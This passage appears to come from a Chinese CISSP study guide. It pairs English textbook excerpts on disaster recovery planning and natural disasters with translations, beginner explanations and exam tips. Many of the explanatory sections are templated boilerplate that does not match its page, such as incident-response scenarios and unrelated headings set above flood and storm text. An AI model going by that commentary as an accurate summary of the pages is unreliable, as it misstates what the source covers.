看到 SP 800 系列、CSF、RMF 常联想到 NIST。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 02 / PDF P1218

第 1218 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

7.12.5 Full interruption 7.12.6 Communications (e.g., stakeholders, test status, regulators) In Chapter 3, “Business Continuity Planning,” you learned the essential elements of business continuity planning (BCP)—the art of helping your organization assess priorities and design resilient processes that will allow continued operations in the event of a disaster. Disaster recovery planning (DRP) is the technical complement to the business-focused BCP exercise. It includes the technical controls that prevent disruptions and facilitate the restoration of service as quickly as possible after a disruption occurs.

Together, the disaster recovery and business continuity plans kick in and guide the actions of emergency-response personnel until the end goal is reached—which is to see the business restored to full operating capacity in its primary operations facilities. While reading this chapter, you may notice many areas of overlap between the BCP and DRP processes. Our discussion of specific disasters provides information on how to handle them from both BCP and DRP points of view. Although the ISC2 CISSP objectives draw a distinction between these two areas, most organizations simply have a single team to address both business continuity and disaster recovery concerns.

In many organizations, the discipline known as business continuity management (BCM) encompasses BCP, DRP, and crisis management under a single umbrella. The Nature of Disaster Disaster recovery planning brings order to the chaos that surrounds the interruption of an organization's normal activities. By its very nature, a disaster recovery plan is designed to cover situations where tensions are already high and cooler heads may not naturally prevail.

Picture the circumstances in which you might find it necessary to implement DRP measures—a hurricane destroys your main operations facility; a fire devastates your main processing center; terrorist activity closes off access to a major metropolitan area. Any event that stops, prevents, or interrupts an organization's ability to perform its work tasks (or threatens to do so) is considered a disaster. The moment that IT becomes unable to support 7.12.5

中文直译 / 整理

完全中断 7.12.6 沟通(例如,利益相关方、测试状态, 监管机构) 在 第 3 章,“业务连续性规划”中,您了解了业务连续性规划(BCP)的 基本要素——帮助您的组织评估优先级并设计弹性流程,以便在灾难发生时 维持运营。 灾难恢复规划(DRP)是业务导向的 BCP 活动的技术补充。 它包括防止中断的 技术控制措施,并在中断发生后尽快恢复服务。 灾难恢复计划和业务连续性计划共同发挥作用,指导应急响应人员的行动,直 至实现最终目标——即恢复业务在主要运营设施中的全面运行能力。 在阅读本章时,您可能会注意到BCP和DRP流程之间存在许多重叠区域。 我们 对具体灾难的讨论提供了从BCP和DRP两个角度应对这些灾难的信息。 尽管 ISC2 CISSP目标对这两个领域进行了区分,但大多数组织通常仅有一个团队来 处理业务连续性和灾难恢复相关问题。 在许多组织中,被称为业务连续性管理 (BCM)的学科将BCP、DRP和危机管理统一在一个框架之下。 灾难的性质 灾难恢复规划为围绕组织正常活动中断的混乱局面带来了秩序。 从其本质来看, 灾难恢复计划旨在应对紧张局势已经高涨、冷静头脑未必自然占上风的情况。

想象一下,你可能不得不实施灾难恢复计划措施的情境——飓风摧毁了你的主 要运营设施; 火灾摧毁了你的主要处理中心; 恐怖活动导致通往主要大都市区 的通道被封锁。 任何停止、阻止或中断组织执行工作任务能力的事件(或威胁 要如此)都被视为灾难。 当IT无法支持

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1218 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 03 / PDF P1219

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

mission-critical processes is the moment DRP kicks in to manage the restoration and recovery procedures. A disaster recovery plan should be set up so that it can almost run on autopilot. The DRP should also be designed to reduce decision-making activities during a disaster as much as possible. Essential personnel should be well trained in their duties and responsibilities in the wake of a disaster and also know the steps they need to take to get the organization up and running as soon as possible. We'll begin by analyzing some of the possible disasters that might strike your organization and the particular threats that they pose.

Many of these were mentioned in Chapter 3, but we'll now explore them in further detail. To plan for natural and unnatural disasters in the workplace, you must first understand their various forms, as explained in the following sections. Natural Disasters Natural disasters reflect the occasional fury of our habitat—violent occurrences that result from changes in the earth's surface or atmosphere that are beyond human control. In some cases, such as hurricanes, scientists have developed sophisticated predictive models that provide ample warning before a disaster strikes. Others, such as earthquakes, can cause devastation at a moment's notice.

A disaster recovery plan should provide mechanisms for responding to both types of disasters, either with a gradual buildup of response forces or as an immediate reaction to a rapidly emerging crisis. Earthquakes Earthquakes are caused by the shifting of seismic plates and can occur almost anywhere in the world without warning. However, they are far more likely to occur along known fault lines that exist in many areas of the world. A wellknown example is the San Andreas Fault, which poses a significant risk to portions of the western United States.

If you live in a region along a fault line where earthquakes are likely, your DRP should address the procedures your business will implement should a seismic event interrupt your normal activities. You might be surprised by some of the regions of the world where earthquakes are considered possible. The U.S. Geological Survey considers the following states to have the highest earthquake hazard risk, with Alaska, California, and Hawaii having a higher hazard risk:

中文直译 / 整理

关键业务流程时,灾难恢复计划便启动,以管理恢复和恢复程序。 应制定灾难恢复计划,使其几乎可以自动运行。 灾难恢复计划还应设计为在灾 难发生时尽可能减少决策活动。 关键人员应接受充分培训,明确其在灾难发生 后的职责与任务,并知晓为尽快恢复组织运营所需采取的步骤。 我们首先将分 析可能影响贵组织的一些潜在灾难及其特有的威胁。 其中许多在第3章中已有提 及,但我们现在将更深入地探讨它们。 为应对工作场所的自然和非自然灾难,您必须首先了解其各种形式,如下文各节 所述。 自然灾害 自然灾害反映了我们生存环境偶尔的暴怒——由地球表面或大气变化引发的、 超出人类控制的剧烈事件。 在某些情况下,如飓风,科学家已开发出复杂的预 测模型,能在灾难发生前提供充分预警。 而在其他情况下,如地震,则可能在 瞬间造成毁灭性破坏。 灾难恢复计划应提供应对这两种类型灾难的机制,或通 过逐步调动应急力量,或对迅速出现的危机作出即时反应。 地震 地震是由地壳板块移动引起的,可能在世界任何地方毫无预警地发生。 然而, 它们更有可能发生在世界上许多地区已知的断层线上。 一个著名的例子是圣安 德烈亚斯断层,它对美国西部部分地区构成重大风险。

如果您生活在断层线附 近、可能发生地震的地区,您的灾难恢复计划应明确您的企业应在地震事件中 断正常活动时采取的程序。 您可能会对一些被认为是可能发生地震的世界地区感到惊讶。 美国地质调查局 认为以下州具有最高的地震危险风险,其中阿拉斯加、加利福尼亚和夏威夷的 危险风险更高:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 04 / PDF P1220

第 1220 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Alaska Arkansas California Hawaii Idaho Illinois Kentucky Missouri Montana Nevada Oregon South Carolina Tennessee Utah Washington Wyoming However, it is extremely important to recognize that seismic risk is not uniform across a state. Figure 18.1 provides a more granular seismic risk map. If you examine this map, you'll discover that some areas in these high-risk states actually have very low localized risk, whereas there are areas in almost every state where earthquake risk is significant.

中文直译 / 整理

阿拉斯加 阿肯色 加利福尼亚 夏威夷 爱达荷 伊利诺伊 肯塔基 密苏里 蒙大拿 内华达 俄勒冈 南卡罗来纳 田纳西州 Utah 华盛顿 怀俄明 然而,至关重要的是要认识到,地震风险在各州内并非均匀分布。 图18.1提供 了一个更细致的地震风险地图。 如果您查看这张地图,就会发现,这些高风险 州的一些地区实际上具有非常低的局部风险,而几乎每个州都存在地震风险显 著的区域。

小白解释

场景先行:你是公司的安全负责人,正在读第 1220 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1220 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 05 / PDF P1221

第 1221 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 18.1 Seismic hazard map Source: U.S. Geological Survey / Public Domain. Floods Flooding can occur almost anywhere in the world at any time of the year. Some flooding results from the gradual accumulation of rainwater in rivers, lakes, and other bodies of water that then overflow their banks and flood the community. Other floods, known as flash floods, strike when a sudden severe storm dumps more rainwater on an area than the ground can absorb in a short period of time. Floods can also occur when dams are breached. Large waves caused by seismic activity, or tsunamis, combine the awesome power and weight of water with flooding, as we saw during the 2011 tsunami in Japan.

This tsunami amply demonstrated the enormous destructive capabilities of water and the havoc it can wreak on various businesses and

中文直译 / 整理

图 18.1 地震危险性地图 来源:美国地质调查局 / 公有领域。 洪水 洪水几乎可以在世界任何地方、一年中的任何时间发生。 有些洪水是由于雨水 在河流、湖泊和其他水体中逐渐积聚,导致水体溢出河岸而淹没社区。 其他洪 水被称为山洪,当一场突如其来的强风暴在短时间内降下远超地面吸收能力的 降雨时,就会引发此类洪水。 当水坝溃决时,也会发生洪水。 由地震活动引发 的巨大波浪,即海啸,将水的惊人力量与重量与洪水结合在一起,正如我们在 2011年日本海啸中所见。 这场海啸充分展示了水的巨大破坏力及其对各种企业 造成的破坏,

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1221 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 06 / PDF P1222

第 1222 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

economies when it triggered an unprecedented nuclear disaster at Fukushima. According to government statistics, flooding is responsible for approximately $8 billion (that's billion with a B) in damage to businesses and homes each year in the United States. It's important that your DRP make appropriate response plans for the eventuality that a flood may strike your facilities. When you evaluate a firm's risk of damage from flooding to develop business continuity and disaster recovery plans, it's also a good idea to check with responsible individuals and ensure that your organization has sufficient insurance in place to protect it from the financial impact of a flood.

In the United States, most general business policies do not cover flood damage, and you should investigate obtaining specialized government-backed flood insurance under the Federal Emergency Management Agency's (FEMA) National Flood Insurance Program. Outside the U.S., commercial insurance providers may offer these policies. Although flooding is theoretically possible in almost any region of the world, it is much more likely to occur in certain areas. FEMA's National Flood Insurance Program is responsible for completing a flood risk assessment for the entire United States and providing this data to citizens in graphical form. You can view flood maps at http://msc.fema.gov/portal.

This site also provides valuable information on recorded earthquakes, hurricanes, windstorms, hailstorms, and other natural disasters to help you prepare your organization's risk assessment. Figure 18.2 shows a flood map for a portion of the downtown region of Miami, Florida. When viewing flood maps like the example shown in Figure 18.2, you'll find that they often combine several different types of confusing terminology. First, the shading indicates the likelihood of a flood occurring in an area. Areas shaded with the darkest color are described as falling within the 100-year floodplain.

This means that the government estimates the chance of flooding in that area are 1 in 100, or 1.0 percent. Those unshaded lie within the 500-year floodplain, meaning that there is a 1 in 500, or 0.2 percent annual risk of flood. And those shaded more lightly lie between the 100-year floodplain and the 500-year floodplain.

中文直译 / 整理

当它引发福岛前所未有的核灾难时,经济遭受重创。 根据政府统计数据,每年在美国,洪水对企业和家庭造成的损失约为80亿美元 (这是带有一个B的十亿)。 确保您的灾难恢复计划为洪水可能袭击您的设施 这一情况制定适当的应对方案至关重要。 在评估企业因洪水受损的风险以制定业务连续性和灾难恢复计划时, 最好也与相关负责人核实,确保您的组织已购买足够的保险,以防范洪水 带来的财务影响。 在美国,大多数通用商业保险政策不涵盖洪水损失,您 应考虑通过联邦紧急事务管理局(FEMA)的国家洪水保险计划获取专门 的政府支持型洪水保险。 在美国以外地区,商业保险公司可能提供此类保 险。 尽管洪水理论上可能发生在世界上的几乎任何地区,但在某些区域发生的可能 性要大得多。 FEMA的国家洪水保险计划负责对整个美国进行洪水风险评估, 并以图形形式向公众提供这些数据。 您可以在http://msc.fema.gov/portal查 看洪水地图。 该网站还提供有关记录在案的地震、飓风、风暴、冰雹以及其他自然灾害的 宝贵信息,以帮助您为组织的风险评估做好准备。 图 18.2展示了佛罗里达州迈阿密市中心部分区域的洪水地图。

当查看类似示例 的洪水地图时,您会发现它们通常结合了多种令人困惑的术语。 首先,着色表 示某区域发生洪水的可能性。 着色最深的区域被描述为位于百年一遇洪水区。 这意味着政府估计该区域发生洪水的概率为百分之一,即 1.0%。 未着色的区域 位于五百年一遇洪水区,意味着每年发生洪水的风险为五百分之一,即 0.2%。 而着色较浅的区域则介于百年一遇洪水区与五百年一遇洪水区之间。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1222 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 07 / PDF P1223

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

These maps also contain information about the impact of a flood, measured in terms of the depth of flooding expected during a flooding event. Those are described as zones having many different letter codes, which you will not need to memorize for the CISSP exam. FIGURE 18.2 Flood hazard map for Miami–Dade County, Florida For a more detailed tutorial on reading flood maps and current map information, visit www.fema.gov/sites/default/files/documents/how-toread-flood-insurance-rate-map-tutorial.pdf. Storms

中文直译 / 整理

这些地图还包含有关洪水影响的信息,以洪水事件期间预期的水深来衡量。 这 些区域被标记为多种字母代码的区域,您无需为 CISSP 考试记忆这些代码。 图 18.2 佛罗里达州迈阿密‑戴德县的洪水危险图 如需了解有关阅读洪水地图和当前地图信息的更详细教程,请访问 www.fema.gov/sites/default/files/documents/how‑to‑ 阅读洪水保险费率地图教程.pdf。 风暴

小白解释

场景先行:你是公司的安全负责人,正在读第 1223 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 08 / PDF P1224

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Storms come in many forms and pose diverse risks to a business. Prolonged periods of intense rainfall bring the risk of flash flooding, as described in the previous section. Hurricanes and tornadoes come with the threat of high wind speeds that undermine the structural integrity of buildings and turn everyday objects such as trees, lawn furniture, and even vehicles into deadly missiles. Hailstorms bring a rapid onslaught of destructive ice chunks falling from the sky. Many storms also bring the risk of lightning, which can cause severe damage to sensitive electronic components.

For this reason, your business continuity plan should detail appropriate mechanisms to protect against lightning-induced damage, and your disaster recovery plan should include adequate provisions for power outages and equipment damage that might result from a lightning strike. Never underestimate the damage that a single storm can do. In 2017, the Category 4 Atlantic hurricane Harvey marked one of the costliest, deadliest, and strongest hurricanes ever to make landfall in the continental United States. It bore a path of destruction through Texas, destroying both natural and human-made features.

The total economic impact stemming from the damage Harvey caused is estimated at more than $125 billion, and it directly resulted in 68 deaths. Storm damage continues to result in devastating costs, partially driven by inflation in building costs and partially driven by climate change. In 2022, climate and weather disasters amounted to $165 billion. If you live in an area susceptible to a certain type of severe storm, it's important to regularly monitor weather forecasts from responsible government agencies.

For example, disaster recovery specialists in hurricane-prone areas should periodically check the website of the National Weather Service's National Hurricane Center (www.nhc.noaa.gov) during hurricane season. This website allows you to monitor Atlantic and Pacific storms that may pose a risk to your region before word about them hits the local news. This knowledge lets you begin a gradual and proactive response to the storm before time runs out. Fires Fires can start for a variety of reasons, both natural and human-made, but both forms can be equally devastating. During the BCP/DRP process, you

中文直译 / 整理

风暴有多种形式,对业务构成多种风险。 长时间的强降雨会带来突发性洪水的 风险,如前一节所述。 飓风和龙卷风伴随着强风的威胁,这些强风会破坏建筑 物的结构完整性,并将树木、庭院家具甚至车辆等日常物品变成致命的导弹。 冰雹风暴则带来从天而降的破坏性冰块的迅速袭击。 许多风暴还伴随着雷电的 风险,雷电可能对敏感的电子元件造成严重损害。 因此,您的业务连续性计划 应详细说明保护免受雷电损害的适当机制,您的灾难恢复计划也应包含应对雷 击可能导致的断电和设备损坏的充分措施。 绝不要低估一场风暴可能造成的破 坏。 2017年,四级大西洋飓风哈维成为有记录以来登陆美国大陆造成的损失最惨重、 死亡人数最多、强度最强的飓风之一。 它横扫德克萨斯州,摧毁了自然与人工 设施。 哈维造成的破坏带来的总经济损失估计超过1250亿美元,并直接导致 68人死亡。 风暴造成的损失持续带来毁灭性成本,部分由建筑成本通胀驱动, 部分由气候变化驱动。 2022年,气候和天气灾害造成的损失达1650亿美元。 如果您居住在易受某种强风暴影响的地区,定期关注负责任的政府机 构发布的天气预报至关重要。

例如,飓风多发地区的灾害恢复专家应在飓 风季节定期访问美国国家气象局国家飓风中心的网站(www.nhc.noaa.gov)。 该网站允许您在本地新闻报道之前,监测可能对您的地区构成威胁的大西 洋和太平洋风暴。 这种知识使您能在时间耗尽之前,逐步采取主动应对措 施。 火灾 火灾可能由各种自然或人为原因引发,但这两种形式都可能同样具有破坏性。 在BCP/DRP过程中,您

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 09 / PDF P1225

第 1225 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

should evaluate the risk of fire and implement at least basic measures to mitigate that risk and prepare the business for recovery from a catastrophic fire in a critical facility. Some regions of the world are susceptible to wildfires during the warm season. These fires, once started, spread in somewhat predictable patterns, and fire experts working with meteorologists can produce relatively accurate forecasts of a wildfire's potential path. It is important, of course, to remember that wildfires can behave unpredictably and require constant vigilance. In 2018, the Camp Fire in California destroyed the town of Paradise within 4 hours of ignition.

The damage caused by forest fires continues to increase, driven by climate change. In 2020, the state of California experienced over 9,600 fires burning over 4.3 million acres of the state. To put that in context, 4 percent of the land area of the state of California burned in a single year. In 2023, a significant wildfire affected Maui, causing widespread damage and over a hundred deaths. This terrible event underscores the escalating threat of wildfires. It is a reminder of the necessity for robust fire risk assessment and preparedness as part of any comprehensive business continuity and disaster recovery planning effort.

As with many other types of large-scale natural disasters, you can obtain valuable information about impending threats on the web. In the United States, the National Interagency Fire Center posts daily fire updates and forecasts on its website: www.nifc.gov/fireInfo/nfn.htm. Other countries have similar warning systems in place. Pandemics Pandemics pose a significant health and safety risk to society and have the potential to disrupt business operations in a manner unlike many other disasters. Rather than causing physical damage, pandemics threaten the safety of individuals and prevent them from gathering in large numbers, shutting down offices and other facilities.

The COVID-19 coronavirus pandemic was the most severe example to occur in the past century, but numerous other smaller outbreaks have occurred, including the SARS outbreak, avian flu, and swine flu. Major outbreaks like

中文直译 / 整理

应评估火灾风险,并实施至少基本的措施以减轻该风险,并为关键设施发生 灾难性火灾后的业务恢复做好准备。 世界上某些地区在温暖季节容易发生野火。 这些火灾一旦发生,会以相对可预 测的模式蔓延,消防专家与气象学家合作可以对野火的潜在路径做出相对准确 的预报。 当然,必须记住,野火的行为可能不可预测,需要持续保持警惕。 2018年,加利福尼亚州的营火在点火后4小时内摧毁了天堂镇。 森林火灾造成的破坏持续增加,这由气候变化所驱动。 2020年,加利福尼亚州 经历了超过9600场火灾,烧毁了该州超过430万英亩的土地。 作为参考,该州 4%的土地面积在一年内被烧毁。 2023年,一场重大野火影响了茂宜岛,造成广 泛破坏和超过百人死亡。 这一惨痛事件突显了野火威胁的日益加剧。 它提醒我 们,将强有力的火灾风险评估和防范措施纳入任何全面的业务连续性和灾难恢 复计划中是必要的。 与许多其他类型的大型自然灾害一样,您可以在网上获取有关潜在威 胁的宝贵信息。 在美国,国家跨机构消防中心在其网站上发布每日火灾更 新和预报:www.nifc.gov/fireInfo/nfn.htm。 其他国家也有类似的预警系 统。

大流行病 大流行病对社会构成重大的健康和安全风险,并可能以不同于其他许多灾难 的方式扰乱业务运营。 它们并非造成物理破坏,而是威胁个人安全,阻止人 们大规模聚集,导致办公室和其他设施关闭。 COVID‑19冠状病毒大流行是过去一个世纪中最严重的例子,但还发生过许多 其他较小的疫情,包括SARS疫情、禽流感和猪流感。 重大疫情如

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1225 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P1226

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

COVID-19 may be infrequent, but the severity of this risk requires careful planning, including building contingency plans for how businesses will operate in a pandemic response mode and what types of insurance may or may not provide coverage in response to a pandemic. Other Natural Events Some regions of the world are prone to localized types of natural disasters. During the BCP/DRP process, your assessment team should analyze all of your organization's operating locations and gauge the impact that such events might have on your business. For example, many parts of the world are subject to volcanic eruptions.

